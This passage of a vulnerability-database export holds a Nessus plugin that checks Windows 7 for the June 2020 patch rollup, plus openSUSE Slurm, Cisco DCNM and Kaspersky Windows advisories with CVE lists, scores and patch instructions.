handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1246, CVE-2020-1262)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253)\");\n # https://support.microsoft.com/en-us/help/4561669/windows-7-update-kb4561669\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b7da0444\");\n # https://support.microsoft.com/en-us/help/4561643/windows-7-update-kb4561643\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?602a11b7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4561669 or Cumulative Update KB4561643.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1299\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1317\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-06';\nkbs = make_list(\n '4561643',\n '4561669'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.1', \n sp:1,\n rollup_date:'06_2020',\n bulletin:bulletin,\n rollup_kb_list:[4561643, 4561669])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2022-11-10T08:10:50", "description": "An update that fixes one vulnerability is now available.\n\nDescription:\n\n This update for slurm fixes the following issues:\n\n - Fix Authentication Bypass when Message Aggregation is enabled\n CVE-2020-12693 This fixes and issue where authentication could be\n bypassed via an alternate path or channel when message Aggregation was\n enabled. A race condition allowed a user to launch a process as an\n arbitrary user. Add:\n Fix-Authentication-Bypass-when-Message-Aggregation-is-enabled-CVE-2020-1269\n 3.patch (CVE-2020-12693, bsc#1172004).\n - Remove unneeded build dependency to postgresql-devel.\n\n This update was imported from the SUSE:SLE-15-SP1:Update update project.\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2020-1421=1", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-14T00:00:00", "type": "suse", "title": "Security update for slurm (moderate)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1269", "CVE-2020-12693"], "modified": "2020-09-14T00:00:00", "id": "OPENSUSE-SU-2020:1421-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/BDZYHLEFCP25ZV6GY7ZKC367RLZBWNWM/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-06T17:59:12", "description": "An update that fixes one vulnerability is now available.\n\nDescription:\n\n This update for slurm_18_08 fixes the following issues:\n\n - Fix Authentication Bypass when Message Aggregation is enabled\n CVE-2020-12693 This fixes and issue where authentication could be\n bypassed via an alternate path or channel when message Aggregation was\n enabled. A race condition allowed a user to launch a process as an\n arbitrary user. (CVE-2020-12693, bsc#1172004). Add:\n Fix-Authentication-Bypass-when-Message-Aggregation-is-enabled-CVE-2020-1269\n 3.patch\n - Remove unneeded build dependency to postgresql-devel.\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.2:\n\n zypper in -t patch openSUSE-2020-1468=1", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-19T00:00:00", "type": "suse", "title": "Security update for slurm_18_08 (moderate)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1269", "CVE-2020-12693"], "modified": "2020-09-19T00:00:00", "id": "OPENSUSE-SU-2020:1468-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/AOGBNQCP74CSMJ5E2JK4ACYCZHB34XNQ/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-06T17:59:05", "description": "An update that fixes one vulnerability is now available.\n\nDescription:\n\n This update for slurm_18_08 fixes the following issues:\n\n - Fix Authentication Bypass when Message Aggregation is enabled\n CVE-2020-12693 This fixes and issue where authentication could be\n bypassed via an alternate path or channel when message Aggregation was\n enabled. A race condition allowed a user to launch a process as an\n arbitrary user. (CVE-2020-12693, bsc#1172004). Add:\n Fix-Authentication-Bypass-when-Message-Aggregation-is-enabled-CVE-2020-1269\n 3.patch\n - Remove unneeded build dependency to postgresql-devel.\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2020-1969=1", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-19T00:00:00", "type": "suse", "title": "Security update for slurm_18_08 (moderate)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1269", "CVE-2020-12693"], "modified": "2020-11-19T00:00:00", "id": "OPENSUSE-SU-2020:1969-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/BUZCI5YDK7I74E6E3IP5YWR5GMSO4LPV/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cisco": [{"lastseen": "2022-12-22T12:16:06", "description": "Multiple vulnerabilities in Cisco Data Center Network Manager (DCNM) could allow an attacker to spoof a trusted host or construct a man-in-the-middle attack to extract sensitive information or alter certain API requests.\n\nThese vulnerabilities are due to insufficient certificate validation when establishing HTTPS requests with the affected device.\n\nFor more information about these vulnerabilities, see the Details [\"#details\"] section of this advisory.\n\nCisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.\n\nThis advisory is available at the following link:\nhttps://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-cert-check-BdZZV9T3 [\"https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-cert-check-BdZZV9T3\"]", "cvss3": {}, "published": "2021-01-20T16:00:00", "type": "cisco", "title": "Cisco Data Center Network Manager Certificate Validation Vulnerabilities", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2020-1276", "CVE-2021-1276", "CVE-2021-1277"], "modified": "2021-01-20T16:00:00", "id": "CISCO-SA-DCNM-CERT-CHECK-BDZZV9T3", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-cert-check-BdZZV9T3", "cvss": {"score": 7.5, "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"}}], "kaspersky": [{"lastseen": "2021-08-18T11:03:17", "description": "### *Detect date*:\n06/09/2020\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to obtain sensitive information, execute arbitrary code, gain privileges, cause denial of service, bypass security restrictions.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 1803 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows Server 2019 (Server Core installation) \nWindows Server 2012 (Server Core installation) \nWindows 10 Version 1903 for 32-bit Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1709 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server, version 1803 (Server Core Installation) \nWindows Server 2012 R2 \nWindows 10 Version 1709 for 32-bit Systems \nWindows 10 Version 1803 for 32-bit Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2016 (Server Core installation) \nMicrosoft Visual Studio 2019 version 16.6 (includes 16.0 - 16.5) \nMicrosoft Visual Studio 2015 Update 3 \nWindows Server 2019 \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 10 Version 2004 for x64-based Systems \nMicrosoft Visual Studio 2019 version 16.4 (includes 16.0 - 16.3) \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 1903 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows Server, version 2004 (Server Core installation) \nMicrosoft Visual Studio 2017 version 15.9 (includes 15.0 - 15.8) \nWindows 10 Version 1607 for 32-bit Systems \nWindows 8.1 for x64-based systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 1803 for ARM64-based Systems \nMicrosoft Visual Studio 2019 version 16.0 \nWindows Server, version 1909 (Server Core installation) \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 for x64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows 10 Version 1709 for ARM64-based Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows Server 2012 \nWindows 10 Version 1903 for ARM64-based Systems \nWindows RT 8.1 \nWindows 10 Version 1909 for ARM64-based Systems \nWindows Server 2016 \nWindows 10 Version 2004 for HoloLens \nWindows 10 Version 2004 for 32-bit Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 10 Version 1903 for HoloLens \nWindows 10 Version 1809 for HoloLens \nWindows Server 2012 R2 (Server Core installation) \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server, version 1903 (Server Core installation)\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2020-0986](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0986>) \n[CVE-2020-1348](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1348>) \n[CVE-2020-1264](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1264>) \n[CVE-2020-1265](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1265>) \n[CVE-2020-1266](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1266>) \n[CVE-2020-1261](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1261>) \n[CVE-2020-1262](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1262>) \n[CVE-2020-1263](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1263>) \n[CVE-2020-1268](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1268>) \n[CVE-2020-1269](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1269>) \n[CVE-2020-1299](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1299>) \n[CVE-2020-1291](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1291>) \n[CVE-2020-1290](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1290>) \n[CVE-2020-1293](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1293>) \n[CVE-2020-1292](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1292>) \n[CVE-2020-1294](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1294>) \n[CVE-2020-1296](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1296>) \n[CVE-2020-1160](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1160>) \n[CVE-2020-1259](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1259>) \n[CVE-2020-1311](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1311>) \n[CVE-2020-1211](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1211>) \n[CVE-2020-1162](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1162>) \n[CVE-2020-1212](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1212>) \n[CVE-2020-1217](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1217>) \n[CVE-2020-1282](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1282>) \n[CVE-2020-1283](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1283>) \n[CVE-2020-1280](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1280>) \n[CVE-2020-1281](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1281>) \n[CVE-2020-1286](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1286>) \n[CVE-2020-1287](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1287>) \n[CVE-2020-1284](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1284>) \n[CVE-2020-1202](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1202>) \n[CVE-2020-1203](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1203>) \n[CVE-2020-1201](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1201>) \n[CVE-2020-1206](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1206>) \n[CVE-2020-1207](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1207>) \n[CVE-2020-1204](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1204>) \n[CVE-2020-1324](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1324>) \n[CVE-2020-1208](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1208>) \n[CVE-2020-1209](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1209>) \n[CVE-2020-1239](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1239>) \n[CVE-2020-1238](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1238>) \n[CVE-2020-1237](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1237>) \n[CVE-2020-1236](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1236>) \n[CVE-2020-1235](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1235>) \n[CVE-2020-1234](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1234>) \n[CVE-2020-1233](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1233>) \n[CVE-2020-1232](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1232>) \n[CVE-2020-1231](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1231>) \n[CVE-2020-1334](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1334>) \n[CVE-2020-1222](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1222>) \n[CVE-2020-1309](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1309>) \n[CVE-2020-1302](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1302>) \n[CVE-2020-1301](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1301>) \n[CVE-2020-1300](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1300>) \n[CVE-2020-1307](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1307>) \n[CVE-2020-1306](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1306>) \n[CVE-2020-1305](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1305>) \n[CVE-2020-1304](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1304>) \n[CVE-2020-1196](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1196>) \n[CVE-2020-1197](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1197>) \n[CVE-2020-1194](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1194>) \n[CVE-2020-1199](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1199>) \n[CVE-2020-1120](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1120>) \n[CVE-2020-1314](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1314>) \n[CVE-2020-1316](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1316>) \n[CVE-2020-1317](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1317>) \n[CVE-2020-1310](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1310>) \n[CVE-2020-1258](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1258>) \n[CVE-2020-1312](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1312>) \n[CVE-2020-1313](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1313>) \n[CVE-2020-1255](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1255>) \n[CVE-2020-1254](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1254>) \n[CVE-2020-1257](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1257>) \n[CVE-2020-1251](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1251>) \n[CVE-2020-1253](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1253>) \n[CVE-2020-1248](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1248>) \n[CVE-2020-1246](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1246>) \n[CVE-2020-1247](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1247>) \n[CVE-2020-1244](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1244>) \n[CVE-2020-1241](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1241>) \n[CVE-2020-0915](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0915>) \n[CVE-2020-0916](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0916>) \n[CVE-2020-1279](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1279>) \n[CVE-2020-1278](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1278>) \n[CVE-2020-1273](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1273>) \n[CVE-2020-1272](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1272>) \n[CVE-2020-1271](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1271>) \n[CVE-2020-1270](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1270>) \n[CVE-2020-1277](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1277>) \n[CVE-2020-1276](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1276>) \n[CVE-2020-1275](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1275>) \n[CVE-2020-1274](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1274>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Visual Studio](<https://threats.kaspersky.com/en/product/Microsoft-Visual-Studio/>)\n\n### *CVE-IDS*:\n[CVE-2020-1160](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1160>)2.1Warning \n[CVE-2020-1281](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1281>)6.8High \n[CVE-2020-1287](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1287>)6.8High \n[CVE-2020-1348](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1348>)4.3Warning \n[CVE-2020-1301](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1301>)6.5High \n[CVE-2020-1207](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1207>)7.2High \n[CVE-2020-1262](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1262>)7.2High \n[CVE-2020-1263](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1263>)2.1Warning \n[CVE-2020-1246](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1246>)7.2High \n[CVE-2020-1247](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1247>)7.2High \n[CVE-2020-1208](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1208>)9.3Critical \n[CVE-2020-1300](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1300>)6.8High 